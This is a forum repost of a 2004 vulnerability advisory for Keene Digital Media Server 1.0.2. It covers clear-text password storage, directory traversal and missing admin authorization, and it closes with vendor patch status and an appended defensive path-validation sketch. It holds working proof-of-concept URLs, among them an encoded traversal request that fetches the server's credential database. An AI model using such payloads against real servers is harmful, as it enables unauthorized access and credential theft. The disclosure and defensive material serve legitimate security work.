Full Version: Keene Digital Media Server
qcred11
Aug 12 2004, 02:44 PM
QUOTE



Keene Digital Media Server Discloses Files and Passwords to Remote Authenticated Users

Application: Keene Digital Media Server
Web Site:    http://www.keenesoftware.com/
Versions:    1.0.2
Platform:    Windows
Bugs:        1) Clear Text Passwords
             2) Directory Traversal
             3) Authorization

1) Introduction
2) Bug
3) The Code
4) Fix


===============
1) Introduction
===============

Keene Digital Media Server is the easiest way to
share or view your library of digital pictures, music, videos or any computer files over the web.


=======
2) Bugs
=======

1)

Keene Digital Media Server stores usernames and passwords in clear text under:

\Program Files\Keene Software\Digital Media Server\dmscore.db

3)

Any authenticated user can perform administrative tasks.



===========
3) The Code
===========

2) http://127.0.0.1:8080/dms/%2e%2e/%2e%2e/dmscore.db

3) http://127.0.0.1:8080/dms/adminusers.kspx


===========
4) The Fix
===========

Date of Vendor Notification:

04-08-04

Status:

08-08-04
 
This is being addressed in our next patch release, 1.0.4, which should be released in about a week or so.



Source: http://www.securitytracker.com/alerts/2004/Aug/1010928.html
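
As a defender-side illustration of bug 2 (an added example, not part of the original post or the vendor's code), this shows how a server can decode a request path and confirm it stays inside its document root before opening a file. The function names `resolve` and `demo` and the directory layout are assumptions made for the sketch; only the `/dms/` prefix and the first denied request come from the advisory.

```python
import os
import tempfile
from urllib.parse import unquote

URL_PREFIX = "/dms/"  # URL prefix taken from the advisory's example requests


def resolve(doc_root, raw_path):
    """Map a raw request path to a file under doc_root, or return None."""
    path = unquote(raw_path.split("?", 1)[0])
    # If a second decode still changes the string, the client double-encoded
    # it (%252e%252e); refuse rather than guess what was meant.
    if unquote(path) != path or "\x00" in path:
        return None
    # The product runs on Windows, where "\" is also a path separator.
    path = path.replace("\\", "/")
    if not path.startswith(URL_PREFIX):
        return None
    segments = [s for s in path[len(URL_PREFIX):].split("/") if s not in ("", ".")]
    # Strict policy: no parent references and no drive or stream specifiers.
    if any(s == ".." or ":" in s for s in segments):
        return None
    root = os.path.realpath(doc_root)
    candidate = os.path.realpath(os.path.join(root, *segments))
    # Final containment check also catches symlinks that leave the root.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def demo():
    """Build a constructed directory layout and classify sample requests."""
    base = tempfile.mkdtemp()
    doc_root = os.path.join(base, "app", "web")  # constructed layout
    os.makedirs(os.path.join(doc_root, "music"))
    requests = [
        "/dms/music/track.mp3",                   # constructed, legitimate
        "/dms/%2e%2e/%2e%2e/dmscore.db",          # request from the advisory
        "/dms/%252e%252e/%252e%252e/dmscore.db",  # constructed, double-encoded
        "/dms/..%5c..%5cdmscore.db",              # constructed, backslashes
        "/dms/music/../music/track.mp3",          # constructed, denied by policy
    ]
    return {r: resolve(doc_root, r) is not None for r in requests}


if __name__ == "__main__":
    for request, allowed in demo().items():
        print("ALLOW" if allowed else "DENY ", request)
```

The check does not address bug 3: the administrative page still needs its own server-side role check on every request, independent of path handling.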